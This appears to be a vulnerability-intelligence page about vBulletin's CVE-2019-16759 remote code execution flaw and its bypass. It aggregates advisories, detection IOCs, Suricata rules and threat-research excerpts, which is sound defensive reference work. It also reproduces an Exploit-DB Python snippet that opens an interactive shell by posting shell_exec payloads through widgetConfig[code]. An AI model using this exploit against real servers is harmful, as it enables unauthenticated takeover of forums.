CVE-2019-16759
published 2019-09-24CVE-2019-16759: vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.
PriorityP198critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
99.73%
100.0th percentile
vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vbulletin | vbulletin | 5.0.0 – 5.5.4 | — |
| vbulletin | vbulletin | 5.5.4 – 5.6.2 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect POST requests to /index.php with routestring parameter set to 'ajax/render/widget_php' — this is the canonical exploit path for CVE-2019-16759. ↗
- →Inspect POST body for the 'widgetConfig[code]' parameter containing PHP code or shell_exec calls, which is the injection vector for this SSTI/RCE. ↗
- →Monitor for unauthorized modifications to bbcode.php (includes/vb5/frontend/controller/bbcode.php); attackers overwrote this file to implant a backdoor gated by the 'epass' request parameter. ↗
- →Detect HTTP requests containing the 'epass' parameter with value '2dmfrb28nu3c6s9j', which is the C2 backdoor authentication token implanted in compromised vBulletin instances. ↗
- →Check Point IPS blade signature name 'vBulletin Forum Remote Code Execution (CVE-2019-16759)' can be used as a reference for IPS/IDS rule naming and tuning. ↗
- ·The vulnerability only triggers when PHP rendering is enabled in vBulletin's administration panel; disabling PHP, Static HTML, and Ad Module rendering mitigates the attack without patching. ↗
- ·CVE-2020-7373 (vBulletin 5.5.4–5.6.2 via subWidgets/widget_tabbedcontainer_tab_panel) is an incomplete fix bypass of CVE-2019-16759; detections for the original CVE may not cover this variant. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-c7wq-5768-48mp: vBulletin 5
ghsa_unreviewed·2022-05-24
CVE-2019-16759 [HIGH] CWE-20 GHSA-c7wq-5768-48mp: vBulletin 5
vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.
GHSA
GHSA-mvwh-2m72-5jm7: vBulletin 5
ghsa_unreviewed·2022-05-24·CVSS 9.8
CVE-2020-7373 [CRITICAL] CWE-77 GHSA-mvwh-2m72-5jm7: vBulletin 5
vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. ALSO NOTE: CVE-2020-7373 is a duplicate of CVE-2020-17496. CVE-2020-17496 is the preferred CVE ID to track this vulnerability.
GHSA
GHSA-j77p-6wx9-cjqq: vBulletin 5
ghsa_unreviewed·2022-05-24·CVSS 9.8
CVE-2020-17496 [CRITICAL] CWE-74 GHSA-j77p-6wx9-cjqq: vBulletin 5
vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
VulnCheck
vBulletin PHP Module Remote Code Execution Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-17496 [CRITICAL] CWE-74 vBulletin PHP Module Remote Code Execution Vulnerability
vBulletin PHP Module Remote Code Execution Vulnerability
The PHP module within vBulletin contains an unspecified vulnerability that allows for remote code execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. This CVE ID resolves an incomplete patch for CVE-2019-16759.
Affected: vBulletin vBulletin
Required Action: Apply updates per vendor instructions.
Exploitation References: https://blogs.juniper.net/en-us/threat-research/everything-but-the-kitchen-sink-more-attacks-from-the-gitpaste-12-worm; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-18&host_
VulnCheck
vBulletin PHP Module Remote Code Execution Vulnerability
vulncheck·2019·CVSS 9.8
CVE-2019-16759 [CRITICAL] CWE-94 vBulletin PHP Module Remote Code Execution Vulnerability
vBulletin PHP Module Remote Code Execution Vulnerability
The PHP module within vBulletin contains an unspecified vulnerability that allows for remote code execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.
Affected: vBulletin vBulletin
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-vbulletin-pre-auth-rce-vulnerability-cve-2019-16759/; https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-ii/; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/11/09055246/Mod
CISA
vBulletin PHP Module Remote Code Execution Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2019-16759 [CRITICAL] CWE-94 vBulletin PHP Module Remote Code Execution Vulnerability
Vulnerability: vBulletin PHP Module Remote Code Execution Vulnerability
Affected: vBulletin vBulletin
The PHP module within vBulletin contains an unspecified vulnerability that allows for remote code execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-16759
Remediation Due Date: 2022-05-03
CISA
vBulletin PHP Module Remote Code Execution Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2020-17496 [CRITICAL] CWE-74 vBulletin PHP Module Remote Code Execution Vulnerability
Vulnerability: vBulletin PHP Module Remote Code Execution Vulnerability
Affected: vBulletin vBulletin
The PHP module within vBulletin contains an unspecified vulnerability that allows for remote code execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. This CVE ID resolves an incomplete patch for CVE-2019-16759.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-17496
Remediation Due Date: 2022-05-03
Suricata
ET WEB_SPECIFIC_APPS vBulletin RCE Inbound (CVE-2019-16759 Bypass)
suricata·2020-08-10·CVSS 9.8
CVE-2019-16759 [CRITICAL] ET WEB_SPECIFIC_APPS vBulletin RCE Inbound (CVE-2019-16759 Bypass)
ET WEB_SPECIFIC_APPS vBulletin RCE Inbound (CVE-2019-16759 Bypass)
Rule: alert http $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET WEB_SPECIFIC_APPS vBulletin RCE Inbound (CVE-2019-16759 Bypass)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/widget_tabbedcontainer_tab_panel"; fast_pattern; http.request_body; content:"subWidgets|5b|"; content:"|3b|"; distance:0; reference:url,blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/; classtype:attempted-admin; sid:2030667; rev:1; metadata:attack_target Web_Server, created_at 2020_08_10, cve CVE_2019_16759, deployment Perimeter, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_08_10;)
Suricata
ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M2
suricata·2019-10-14·CVSS 9.8
CVE-2019-16759 [CRITICAL] ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M2
ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M2
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M2"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"routestring"; fast_pattern; content:"ajax"; within:7; content:"render"; within:9; content:"widget_php"; within:13; http.request_body; content:"widgetConfig"; nocase; content:"code"; within:7; content:"echo"; distance:0; nocase; content:"shell_exec"; nocase; within:13; reference:url,seclists.org/fulldisclosure/2019/Sep/31; reference:url,unit42.paloaltonetworks.com/exploits-in-the-wild-for-vbulletin-pre-auth-rce-vulnerability-cve-2019-16759/; classtype:attempted-admin; sid:2028825; rev:3; metad
Suricata
ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M3
suricata·2019-10-14·CVSS 9.8
CVE-2019-16759 [CRITICAL] ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M3
ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M3
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M3"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"?routestring"; fast_pattern; content:"ajax"; within:7; content:"render"; within:9; content:"widget_php"; within:13; content:"&widgetConfig"; nocase; content:"code"; within:7; content:"echo"; distance:0; nocase; content:"shell_exec"; nocase; within:13; reference:url,seclists.org/fulldisclosure/2019/Sep/31; reference:url,unit42.paloaltonetworks.com/exploits-in-the-wild-for-vbulletin-pre-auth-rce-vulnerability-cve-2019-16759/; classtype:attempted-admin; sid:2028826; rev:3; metadata:affected_produ
Suricata
ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M1
suricata·2019-09-25·CVSS 9.8
CVE-2019-16759 [CRITICAL] ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M1
ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M1
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M1"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"routestring"; fast_pattern; content:"ajax"; within:100; content:"render"; within:9; content:"widget_php"; within:13; content:"widgetConfig"; nocase; content:"code"; within:7; content:"echo"; distance:0; nocase; content:"shell_exec"; nocase; within:13; reference:url,seclists.org/fulldisclosure/2019/Sep/31; classtype:attempted-admin; sid:2028621; rev:3; metadata:affected_product Web_Server_Applications, attack_target Server, created_at 2019_09_25, cve CVE_2019_16759, deployment Perimet
Exploit-DB
vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
exploitdb·2020-08-12·CVSS 9.8
[CRITICAL] vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
---
# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
# Date: 2020-08-09
# Exploit Author: @zenofex
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: None
# Version: 5.4.5 through 5.6.2
# Tested on: vBulletin 5.6.2 on Ubuntu 19.04
# CVE : None
# vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code
# execution vulnerability caused by incomplete patching of the previous
# "CVE-2019-16759" RCE. This logic bug allows for a single pre-auth
# request to execute PHP code on a target vBulletin forum.
#More info can be found at:
#https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
#!/usr/bin/env python3
# vBulletin 5.x pre-auth widget
Exploit-DB
vBulletin 5.x - Remote Command Execution (Metasploit)
exploitdb·2019-09-30·CVSS 9.8
CVE-2019-16759 [CRITICAL] vBulletin 5.x - Remote Command Execution (Metasploit)
vBulletin 5.x - Remote Command Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'vBulletin 5.x 0day pre-quth RCE exploit',
'Description' => %q{
vBulletin 5.x 0day pre-auth RCE exploit.
This should work on all versions from 5.0.0 till 5.5.4
},
'Platform' => 'php',
'License' => MSF_LICENSE,
'Author' => [
'Reported by: anonymous', # reported by
'Original exploit by: anonymous', # original exploit
'Metasploit mod by: r00tpgp', # metasploit module
],
'Payload' =>
{
'BadChars' => "\x22",
},
'References' =>
[
['CVE', 'CVE-2019-16759'],
['EDB', 'NA'],
['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],
['URL', 'https://cve.mitre.org/cgi-bin/cvename.c
Exploit-DB
vBulletin 5.0 < 5.5.4 - 'widget_php ' Unauthenticated Remote Code Execution
exploitdb·2019-09-23
CVE-2019-16759 vBulletin 5.0 < 5.5.4 - 'widget_php ' Unauthenticated Remote Code Execution
vBulletin 5.0 " % sys.argv[0])
params = {"routestring":"ajax/render/widget_php"}
while True:
try:
cmd = raw_input("vBulletin$ ")
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
r = requests.post(url = sys.argv[1], data = params)
if r.status_code == 200:
print r.text
else:
sys.exit("Exploit failed! :(")
except KeyboardInterrupt:
sys.exit("\nClosing shell...")
except Exception, e:
sys.exit(str(e))
Metasploit
vBulletin widgetConfig RCE
metasploit
vBulletin widgetConfig RCE
vBulletin widgetConfig RCE
vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring POST request.
Nuclei
vBulletin 5.5.4 - 5.6.2- Remote Command Execution
nuclei·CVSS 9.8
CVE-2020-17496 [CRITICAL] vBulletin 5.5.4 - 5.6.2- Remote Command Execution
vBulletin 5.5.4 - 5.6.2- Remote Command Execution
vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
Template:
id: CVE-2020-17496
info:
name: vBulletin 5.5.4 - 5.6.2- Remote Command Execution
author: pussycat0x
severity: critical
description: 'vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.'
impact: |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
remediation:
Nuclei
vBulletin 5.0.0-5.5.4 - Remote Command Execution
nuclei·CVSS 9.8
CVE-2019-16759 [CRITICAL] vBulletin 5.0.0-5.5.4 - Remote Command Execution
vBulletin 5.0.0-5.5.4 - Remote Command Execution
vBulletin 5.0.0 through 5.5.4 is susceptible to a remote command execution vulnerability via the widgetConfig parameter in an ajax/render/widget_php routestring request. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: CVE-2019-16759
info:
name: vBulletin 5.0.0-5.5.4 - Remote Command Execution
author: madrobot
severity: critical
description: vBulletin 5.0.0 through 5.5.4 is susceptible to a remote command execution vulnerability via the widgetConfig parameter in an ajax/render/widget_php routestring request. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control
Metasploit
vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.
metasploit·CVSS 9.8
CVE-2019-16759 [CRITICAL] vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.
vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.
This module exploits a logic bug within the template rendering code in vBulletin 5.x. The module uses the vBulletin template rendering functionality to render the 'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument. This causes the former template to load the latter bypassing filters originally put in place to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input allowing the module to achieve PHP remote code execution on the target. This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
[HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (November 2020-January 2021)
Lei Xu
Yue Guan
Vaibhav Singhal
Published: April 12, 2021
Malware
Trend Reports
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
Network security trends
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020 . Several newly observed exploits, including CVE-2020-28188 , CVE-2020-17519 , and CVE-2020-29227 , have emerged and were continuously being exploited in the wild as of late 2020 to earl
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (August-October 2020)
Yue Guan
Lei Xu
Ken Hsu
Zhibin Zhang
Published: January 22, 2021
Malware
Trend Reports
Vulnerabilities
DDoS
Exploits
IoT
Network security trends
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823 , which were the most commonly exploited vulnerabilities in the wild in early summer 2020 , are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213 , have emerged and were being utilized at a constant and concern
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823, which were the most commonly exploited vulnerabilities in the wild in early summer 2020, are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213, have emerged and were being utilized at a constant and concerning rate as of fall 2020. To complicate matters, malicious actors are well aware that new exploits aren’t always needed to get the job done. Based on observations of malicious traffic for the designated three months, weaponized ThinkPHP vulnerabilities like CVE-2018-20062 and CVE-2019-908
Unit42
Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
blogs_unit42·2020-09-03·CVSS 9.8
CVE-2020-17496 [CRITICAL] Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
## Executive Summary
In September 2019, a remote code execution (RCE) vulnerability identified as CVE-2019-16759 was disclosed for vBulletin, a popular forum software. At that time, Unit 42 researchers published a blog on this vBulletin vulnerability, analyzing its root cause and the exploit we found in the wild. By exploiting this vulnerability, an attacker could have gained privileged access and control over any vBulletin server running versions 5.0.0 up to 5.5.4, and potentially lock organizations out from their own sites.
Recently, Unit 42 researchers found exploits in the wild leveraging the vBulletin pre-auth RCE vulnerability CVE-2020-17496. The exploits are a bypass of the fix for the previous vulnerability, CVE-2019-16759, which allows attackers to send a crafted HTTP request wi
Unit42
Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
blogs_unit42·2020-09-03·CVSS 9.8
CVE-2020-17496 [CRITICAL] Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
Threat Research Center
Threat Research
Vulnerabilities
## Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
Haozhe Zhang
Qi Deng
Zhibin Zhang
Ruchna Nigam
Published: September 3, 2020
Threat Research
Vulnerabilities
CVE-2019-16759
CVE-2020-17496
Exploits
## Executive Summary
In September 2019, a remote code execution (RCE) vulnerability identified as CVE-2019-16759 was disclosed for vBulletin, a popular forum software. At that time, Unit 42 researchers published a blog on this vBulletin vulnerability , analyzing its root cause and the exploit we found in the wild. By exploiting this vulnerability, an attacker could have gained privileged access and control over any vBulletin server running versions 5.0.0 up to 5.5.4, and potentially lock organi
Trendmicro
Patches für Sicherheitslücken
blogs_trendmicro·2020-08-17·CVSS 6.1
[MEDIUM] Patches für Sicherheitslücken
## Patches für Sicherheitslücken
Patches für Sicherheitslücken
By: Trend Micro Aug 17, 2020 Read time: ( words)
Save to Folio
Originalartikel von Trend Micro
Schwachstellen setzen Unternehmenssysteme der Kompromittierung aus. Jetzt, da viele Mitarbeiter von zu Hause aus arbeiten und Geräte außerhalb der sicheren Büroumgebungen betreiben, ist die Notwendigkeit, Schwachstellen zu beheben, sobald sie entdeckt werden, noch dringlicher geworden. Neben Microsoft haben kürzlich auch die folgenden Anbieter Patches veröffentlicht: Adobe, Citrix, Intel und vBulletin. Es folgt eine Zusammenfassung dieser kürzlich bekannt gewordenen Schwachstellen, und Organisationen sind gut beraten, sofort zu prüfen, ob die von ihnen verwendete Software von diesen Schwachstellen betroffen ist.
Adobe-Sicherheit
Checkpoint
17th August – Threat Intelligence Bulletin
blogs_checkpoint·2020-08-17
CVE-2020-1380 17th August – Threat Intelligence Bulletin
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 17th August – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 17th August 2020, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
The SANS information security training institute has suffered a data breach comprised of 27,000 records of PII (Personally Identifiable Information) which were forwarded to an external email address. SANS traced the source of the attack to a phishing email.
The city of Lafayette Colorado has fallen victim to a ranso
Tenable
CVE-2020-17496: Zero-Day Remote Code Execution Vulnerability in vBulletin Disclosed
blogs_tenable·2020-08-10·CVSS 9.8
[CRITICAL] CVE-2020-17496: Zero-Day Remote Code Execution Vulnerability in vBulletin Disclosed
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2020-12720: vBulletin Urges Users to Patch Undisclosed Security Vulnerability
blogs_tenable·2020-05-08·CVSS 9.8
[CRITICAL] CVE-2020-12720: vBulletin Urges Users to Patch Undisclosed Security Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Objects in Mirror Are Closer Than They Appear: Reflecting on the Cybersecurity Threats from 2019
blogs_tenable·2019-12-16
Objects in Mirror Are Closer Than They Appear: Reflecting on the Cybersecurity Threats from 2019
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Unit42
Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2019-16759
blogs_unit42·2019-10-09·CVSS 9.8
CVE-2019-16759 [CRITICAL] Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2019-16759
Threat Research Center
Threat Research
Vulnerabilities
## Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2019-16759
Qi Deng
Zhibin Zhang
Hui Gao
Published: October 9, 2019
Cybercrime
Threat Research
Vulnerabilities
CVE-2019-16759
Pre-auth remote code
VBulletin
## Executive Summary
A new zero-day vulnerability was recently disclosed for vBulletin, a proprietary Internet forum software and the assigned CVE number is CVE-2019-16759. Now, several weeks later, Unit 42 researchers have identified active exploitation of this vulnerability in the wild. By exploiting this vulnerability, an unauthenticated attacker can gain privileged access and control over any vBulletin server running versions 5.0.0 up to 5.5.4, and potentially lock organizations out from thei
Unit42
Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2019-16759
blogs_unit42·2019-10-09·CVSS 9.8
CVE-2019-16759 [CRITICAL] Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2019-16759
## Executive Summary
A new zero-day vulnerability was recently disclosed for vBulletin, a proprietary Internet forum software and the assigned CVE number is CVE-2019-16759. Now, several weeks later, Unit 42 researchers have identified active exploitation of this vulnerability in the wild. By exploiting this vulnerability, an unauthenticated attacker can gain privileged access and control over any vBulletin server running versions 5.0.0 up to 5.5.4, and potentially lock organizations out from their own sites. More than 100,000 sites are built on vBulletin, including the forums of major enterprises and organizations, so it’s imperative to patch immediately.
In this blog post we provide new details on the root cause of the vulnerability, proof of concept code (PoC) to demonstrate the vulner
Checkpoint
2nd October – Threat Intelligence Bulletin
blogs_checkpoint·2019-10-02·CVSS 9.8
CVE-2019-16759 [CRITICAL] 2nd October – Threat Intelligence Bulletin
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 2nd October – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 2nd October 2019, please download our Threat Intelligence Bulletin
TOP ATTACKS AND BREACHES
Check Point researchers have identified a targeted and extensive attack against East Asian government entities over the span of 7 months. The attackers, which apparently are members of the Chinese Rancor threat group, used spear-phishing to reach their victims, pretending to send emails from other government offices.
Tenable
Critical Zero-Day Pre-authentication Remote Code Execution Exploit Published for 5.x Versions of vBulletin
blogs_tenable·2019-09-24
Critical Zero-Day Pre-authentication Remote Code Execution Exploit Published for 5.x Versions of vBulletin
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
arXiv
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
arxiv_fulltext·2024-07-31
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
Raveen Kanishka Jayalath*
University of Adelaide, Australia
[email protected]
Hussain Ahmad* *Authors contributed equally to this work. Corresponding author.
University of Adelaide, Australia
[email protected]
Diksha Goel
CSIRO's Data61, Australia
[email protected]
3cmMuhammad Shuja Syed
3cmSLB, USA
[email protected]
Faheem Ullah
University of Adelaide, Australia
[email protected]
plain
## Abstract
Microservice architectures are revolutionizing both small businesses and large corporations, igniting a new era of innovation with their exceptional advantages in maintainability, reusability, and scalability. However, these benefits come w
